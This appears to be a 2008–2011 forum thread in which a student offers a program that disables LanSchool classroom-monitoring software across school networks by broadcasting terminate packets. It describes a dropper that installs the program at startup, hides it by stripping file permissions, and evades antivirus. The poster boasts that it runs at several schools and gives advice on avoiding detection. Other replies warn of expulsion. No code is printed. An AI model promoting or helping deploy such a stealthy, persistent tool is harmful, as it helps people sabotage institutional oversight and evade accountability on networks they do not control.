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 Network-wide LanSchool disabling program
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PostPosted: Fri Apr 25, 2008 3:21 pm   Post subject: Network-wide LanSchool disabling program

Hello all, I've written a program which disables lanschool versions 6.2 and under across the entire network. It installs itself to the startup folder of the local computer, and uses two additional tools, chown.exe and xcacls.exe to change the file permissions, so it can not be easily traced.

The program works by sending 256 broadcast packets every minute, each to a designated channel (0-255), which contains the lanschool terminate packet. When the program is not doing anything, it is sleeping.

Thank you to Hacker Dan for providing documentation about the lanschool packet structure.

This program is entirely standalone and does not require any additional libraries to run. It is GPLv3 licenced.

The actual project consists of three programs:

1)LSenemy.exe, the lanschool disabler
2)makearray.exe, a program which converts a file into a char* array in C, which the dropper uses
3)dropper.exe, a program which extracts LSenemy.exe to the startup folder of the computer, and runs chown.exe and xcacls.exe to remove any file ownership and permissions tied to your account.

dropper.exe contains chown.exe and xcacls.exe, and extracts them when used.

When dropper.exe is run, no indication will be given as to whether the operation was successful or not. The lanschool disabling program will not be run until the next user logs in. dropper.exe may be deleted on the target system after it is run.

The program may be installed on any number of machines without causing conflicts.

To install the program, just run dropper.exe and it's finished. So far, two schools have it running.

Also, dropper.exe will not trigger any virus scanners.

The lanschool disabling program binary

 Filesize:  43.52 KB
 Downloaded:  2071 Time(s)
Source code and binaries, with Code::Blocks project

 Filesize:  500.36 KB
 Downloaded:  2960 Time(s)


PostPosted: Wed May 14, 2008 7:56 pm   Post subject: Re: Network-wide LanSchool disabling program

So? I see that some people have tried it out, how's it working? It's getting more attraction here. 4 or 5 high schools have it now. Soon to be more =D

PostPosted: Thu May 15, 2008 7:03 am   Post subject: RE:Network-wide LanSchool disabling program

Students can probably get in trouble for this. You should not this and probably put a nice disclaimer that you're not responsible for anything, preferablly in a README file as well.

PostPosted: Thu May 15, 2008 12:41 pm   Post subject: RE:Network-wide LanSchool disabling program

Given the nature of this program there is a very good chance it'll get you kicked off a school network for good.

Remember kids, just because you can do something doesn't always make it a good idea to do something.

PostPosted: Thu May 15, 2008 3:59 pm   Post subject: Re: Network-wide LanSchool disabling program

Both give very good points. However, this program does a pretty decent job in making sure you won't get caught. The only way that I can think of, would be if a teacher actively knew what to look for and saw you do it (still very hard to catch), or if you were caught on camera, they traced the packets' origin to that computer, then questioned anyone who logged onto the machine in the past little while. That could be any number of people, however, depending where you used it.

PostPosted: Thu May 15, 2008 6:01 pm   Post subject: Re: Network-wide LanSchool disabling program

Even then, just the fact that you brought it up on an internet forum and claimed it was already running on several schools (Aka a lot of people can point fingers at you) suggests to me that you are far from as safe as you think you are.

I have heard of students getting expelled for far, far less than this. Is it really worth it? Its not as if programs like lanschool are that annoying anyways, you are in an area with people all around you, an extra teacher glancing through hundreds of 1" tiles whenever they have nothing better to do is hardly worth the risk.

Just a hunch, but I have a feeling that after dumping thousands of dollars into tracking down your program and removing it (You realize that they will almost certainly need to hire a tech for a substantial amount of time), they won't be very pleased.

PostPosted: Thu May 15, 2008 6:06 pm   Post subject: Re: Network-wide LanSchool disabling program

Well, I'm not the one who used it actually. But, I'll remove it from this thread. Could mods please delete this thread?

EDIT: Seems I can't remove it from this thread. Ah well.

PostPosted: Thu May 15, 2008 6:33 pm   Post subject: RE:Network-wide LanSchool disabling program

Nope, we're not deleting it. It's a worthwhile study of the flaws in some widely used software afterall Wink

Just don't use it and your safe-ish.

PostPosted: Thu May 15, 2008 8:35 pm   Post subject: Re: Network-wide LanSchool disabling program

Heheh fair enough. I think the makers of LanSchool have finally fixed these flaws in version 7.0, though I'm unsure, as I've only done a little bit of testing with that version. I suppose I could reverse engineer it and post the results here, when I finally have time.

PostPosted: Sat Dec 27, 2008 2:39 pm   Post subject: Re: Network-wide LanSchool disabling program

Please do.

(The post above me)

This LanSchool stuff annoys the crap out of me.

PostPosted: Tue Oct 11, 2011 9:21 am   Post subject: Re: RE:Network-wide LanSchool disabling program

md @ May 15th 2008, 5:33 pm wrote:
Nope, we're not deleting it. It's a worthwhile study of the flaws in some widely used software afterall Wink

Just don't use it and your safe-ish.

Yea be real safe. Most colleges and universities have tiny little clauses in their admissions that allow them to blackball students across the world if caught hacking. I lied. On mine it was asterixed like four times.

Evidently they hate hacking worse than regular cheaters. Is it worth being branded a cheater permantly to just play pool while your teacher lectures...

PostPosted: Tue Oct 11, 2011 10:36 am   Post subject: RE:Network-wide LanSchool disabling program

There's no need to revive ancient threads. This is the second time you've done it today (out of two posts total) so I thought I'd tell you.
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